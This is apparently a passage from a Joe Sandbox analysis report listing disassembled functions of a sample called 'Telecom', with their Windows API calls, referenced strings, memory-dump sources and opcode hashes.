                                                        • Part of subcall function 00441F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00441F87
                                                        • Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441F96
                                                        • Part of subcall function 00441F2D: BeginPath.GDI32(?), ref: 00441FAD
                                                        • Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441FD6
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004D92E3
                                                      • LineTo.GDI32(?,?,?), ref: 004D92F0
                                                      • EndPath.GDI32(?), ref: 004D9300
                                                      • StrokePath.GDI32(?), ref: 004D930E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: 6b669036a590d86146ffe1eed826aba578cb34e0dce2bb9750a42bb5b7a51d8c
                                                      • Instruction ID: bf2257fc3836de567a249f458e7d9ef453b47dca6c53d6807d1da562c13f92cf
                                                      • Opcode Fuzzy Hash: 6b669036a590d86146ffe1eed826aba578cb34e0dce2bb9750a42bb5b7a51d8c
                                                      • Instruction Fuzzy Hash: 83F05E31006258BADB135F54AC0EFCE3F59AF0A324F048102FA15611E1C77955669BAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 004421BC
                                                      • SetTextColor.GDI32(?,?), ref: 004421C6
                                                      • SetBkMode.GDI32(?,00000001), ref: 004421D9
                                                      • GetStockObject.GDI32(00000005), ref: 004421E1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      • Opcode ID: e56880d198d29a2197eb8abc5b7a8cf6c688d52977b085a0df193e399b3576e4
                                                      • Instruction ID: 5e237307938f17d712b3ccb8da7655b8bbe8ed2e6759d4c387eb7f3a73a0deda
                                                      • Opcode Fuzzy Hash: e56880d198d29a2197eb8abc5b7a8cf6c688d52977b085a0df193e399b3576e4
                                                      • Instruction Fuzzy Hash: 9FE06D31641240BADB216F74BC09BEE3B61EB16736F04862BF7FA581E0C77286409B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 0049EC36
                                                      • GetDC.USER32(00000000), ref: 0049EC40
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0049EC60
                                                      • ReleaseDC.USER32(?), ref: 0049EC81
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 7c7034bf8bb1793a9c2962f7aefa881858029fcb6a40303baaa773d52f851692
                                                      • Instruction ID: d3091b440c6502e629825e4c142c550dbd416d11b34a40052fe1bb26425dd31e
                                                      • Opcode Fuzzy Hash: 7c7034bf8bb1793a9c2962f7aefa881858029fcb6a40303baaa773d52f851692
                                                      • Instruction Fuzzy Hash: C6E01A70C05204DFCF419FA1CD08A5DBBB5FB48311F10846BE84AE3250CB389902AF49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 0049EC4A
                                                      • GetDC.USER32(00000000), ref: 0049EC54
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0049EC60
                                                      • ReleaseDC.USER32(?), ref: 0049EC81
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: b0c665224cdf8be7c5635962f0ed76d9f4e9f422ab910191e083d5d7a98b356d
                                                      • Instruction ID: 93ae0d9c0edf4251490f1d0f22e579a2c09cded1d24abafea13d8e3d865be6d3
                                                      • Opcode Fuzzy Hash: b0c665224cdf8be7c5635962f0ed76d9f4e9f422ab910191e083d5d7a98b356d
                                                      • Instruction Fuzzy Hash: 3AE01A70C01204DFCF419FA1CC08A5DBBB5FB48311F10846AE80AE3250C73899019F48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LoadString
                                                      • String ID: @COM_EVENTOBJ$bnJ
                                                      • API String ID: 2948472770-3109360154
                                                      • Opcode ID: c83fd738006a0b0b1a497172f18d1352a00f42408dc7f5b688f542542c1b5f4d
                                                      • Instruction ID: 7c23b74fda0c5e6387f35989127624f8d2d8633506cb6f6045697e53a2f50506
                                                      • Opcode Fuzzy Hash: c83fd738006a0b0b1a497172f18d1352a00f42408dc7f5b688f542542c1b5f4d
                                                      • Instruction Fuzzy Hash: 12F1A270A082009FDB24DF15C841B6BBBE0BF85709F14886EF49697361D779EE45CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004605B2: EnterCriticalSection.KERNEL32(0051170C,?,00000000,?,0044D22A,00513570,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?), ref: 004605BD
                                                        • Part of subcall function 004605B2: LeaveCriticalSection.KERNEL32(0051170C,?,0044D22A,00513570,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?,00000001,00512430), ref: 004605FA
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 00460413: __onexit.LIBCMT ref: 00460419
                                                      • __Init_thread_footer.LIBCMT ref: 004C8658
                                                        • Part of subcall function 00460568: EnterCriticalSection.KERNEL32(0051170C,00000000,?,0044D258,00513570,004827C9,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?), ref: 00460572
                                                        • Part of subcall function 00460568: LeaveCriticalSection.KERNEL32(0051170C,?,0044D258,00513570,004827C9,00000001,00000000,?,?,004BF023,?,?,00000000,00000001,?,00000001), ref: 004605A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: Variable must be of type 'Object'.$bnJ
                                                      • API String ID: 535116098-3946710355
                                                      • Opcode ID: 98d27358708f83fee2d3f2e49669bf19b64b8590f0892e6ff3e52fe0be7d8c14
                                                      • Instruction ID: bc7ae38c67cff7e31b3ae3f0dbb6e589540b9b595dbeac2f5b776b793eb69cff
                                                      • Opcode Fuzzy Hash: 98d27358708f83fee2d3f2e49669bf19b64b8590f0892e6ff3e52fe0be7d8c14
                                                      • Instruction Fuzzy Hash: AF917E78A00208AFDB44EF55D891EAE77B1FF48304F10805EF8066B392DB79AE41CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 0046E67D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 4d75cf50d15c0ae65da1ec44512c1e269cd289b9890bd5591c8a148a61c0acb6
                                                      • Instruction ID: 5f39e9d227be107a9b040e45232e41e29a72b8191ed9128ddc715c254572bca1
                                                      • Opcode Fuzzy Hash: 4d75cf50d15c0ae65da1ec44512c1e269cd289b9890bd5591c8a148a61c0acb6
                                                      • Instruction Fuzzy Hash: 25517B74A4810186C7117B15CD493EB2BE4EB10701FA0CD6FE099863AAFE3D8C969A4F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 131107e49af0fd2b65b37493ebdd074658f119147168c053e27510c8477157e3
                                                      • Instruction ID: 670d2f17fa5a605f6e6d55a6e4903fea7527605cb063da4e1e5b9dfc43890578
                                                      • Opcode Fuzzy Hash: 131107e49af0fd2b65b37493ebdd074658f119147168c053e27510c8477157e3
                                                      • Instruction Fuzzy Hash: 355142715042469FDF25DF28C040ABB7BA0EF12310F24416BEC919B381EB389C96CB6A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 004D40BD
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004D40F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: d67178d71c5f4bcc5839bfe1b312927ce30e1106ac8ee05893b1fa92e0686a55
                                                      • Instruction ID: 636cfdd04c0ad52bcdc5facf3bcfce4f5a6b3b7c588b6b70127514cb6a012b38
                                                      • Opcode Fuzzy Hash: d67178d71c5f4bcc5839bfe1b312927ce30e1106ac8ee05893b1fa92e0686a55
                                                      • Instruction Fuzzy Hash: FC319271510604ABDB11DF64CC50BFB73A9FF88714F00861FF95587290DA79AC81D768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 004D50BD
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004D50D2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 4c9e574a7822b50ae604ec981fb227db27fee116be8fd1701879aec121fa8a07
                                                      • Instruction ID: 3283c5c53871ec8f6c2ce050f219f65e0105e7f6099dd86c5327df58fb778545
                                                      • Opcode Fuzzy Hash: 4c9e574a7822b50ae604ec981fb227db27fee116be8fd1701879aec121fa8a07
                                                      • Instruction Fuzzy Hash: 26313674A0160A9FDB15CFA9C890BDABBB5FF49300F10406BE904AB391DB75A945CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                        • Part of subcall function 00442234: GetWindowLongW.USER32(?,000000EB), ref: 00442242
                                                      • GetParent.USER32(?), ref: 00483440
                                                      • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 004834CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$ParentProc
                                                      • String ID: (Q
                                                      • API String ID: 2181805148-2768264020
                                                      • Opcode ID: a17d2cd9861aeef0884569f8de693dadd0c947f0654e19358697d4b6704ad9a9
                                                      • Instruction ID: f02fafba1500b730ffc7473fdca74fb8aec4b598bfe30c7ff8cff6a328b38431
                                                      • Opcode Fuzzy Hash: a17d2cd9861aeef0884569f8de693dadd0c947f0654e19358697d4b6704ad9a9
                                                      • Instruction Fuzzy Hash: EA210430201100AFDB26AF78CD49DBA3B62EF05760F540646F6251B3F2C3B98E52D718
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00447873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004478B1
                                                        • Part of subcall function 00447873: GetStockObject.GDI32(00000011), ref: 004478C5
                                                        • Part of subcall function 00447873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004478CF
                                                      • GetWindowRect.USER32(00000000,?), ref: 004D4216
                                                      • GetSysColor.USER32(00000012), ref: 004D4230
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: f4d4bc130493075a83068588f85e55cfcb080922c47bfb24c849f94cc6431f70
                                                      • Instruction ID: 68e0e190af518447fd9731ca7294c38a33aeba5abf40b763ebf11e871068ae4d
                                                      • Opcode Fuzzy Hash: f4d4bc130493075a83068588f85e55cfcb080922c47bfb24c849f94cc6431f70
                                                      • Instruction Fuzzy Hash: D0113772A10209AFDB00DFA8CC45AFA7BF8EB48358F01492AFD55E3250D738E851DB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 004A761D
                                                      • _wcslen.LIBCMT ref: 004A7629
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      • Opcode ID: a837b7566ae69477189266fd8418c321f5e078939813c46c4b9dac882bda7dd1
                                                      • Instruction ID: e217fe193175f9c59a7c98630bbbdb69dc7c34031456c49b5a0850e51730a569
                                                      • Opcode Fuzzy Hash: a837b7566ae69477189266fd8418c321f5e078939813c46c4b9dac882bda7dd1
                                                      • Instruction Fuzzy Hash: 0201C432A049278BCB309FBDDC80ABF77B5BF76764740053AE42192291EB39D900D698
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004A2699
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 1b6409b4b73450e23547c3428a9076e97d520ad2693155b6756e78d8a05c080c
                                                      • Instruction ID: b70fa358f96ff48791717684ccad77bf98d65c8d7f1d75cc2fc03b9a6c69574a
                                                      • Opcode Fuzzy Hash: 1b6409b4b73450e23547c3428a9076e97d520ad2693155b6756e78d8a05c080c
                                                      • Instruction Fuzzy Hash: 4101F575A02114BBDB08AB65CC41CFE7774EFA6314B40061FA832973C1DA799818DAA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 004A2593
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: ecb1ae5ff4caadc3fa302e3206d7453259f8fd4846e8d07fc660747798a305e0
                                                      • Instruction ID: 85114feb152ee26dbf643c93c2bf2215c7667846063b42cfcc6b460d02a23f5d
                                                      • Opcode Fuzzy Hash: ecb1ae5ff4caadc3fa302e3206d7453259f8fd4846e8d07fc660747798a305e0
                                                      • Instruction Fuzzy Hash: B801FCB5E411047BDB04E755C916DFF77A8EF66344F50002F7902632C1DA58DE08D6B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 004A2615
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 2b62d9af719f4f771fd4a792b56aeb801a5762341eb7263eb9f3ab1b7f1fd626
                                                      • Instruction ID: f80f6f0cb17ca1cc79887fc6dce304c33675b36b8f696a42c3b168bebf4f4ba3
                                                      • Opcode Fuzzy Hash: 2b62d9af719f4f771fd4a792b56aeb801a5762341eb7263eb9f3ab1b7f1fd626
                                                      • Instruction Fuzzy Hash: C9012BB1E0110477DB05E755D901EFF77A8DF26344F50002BB802A72C1DBA8CE08D6B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004A2720
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
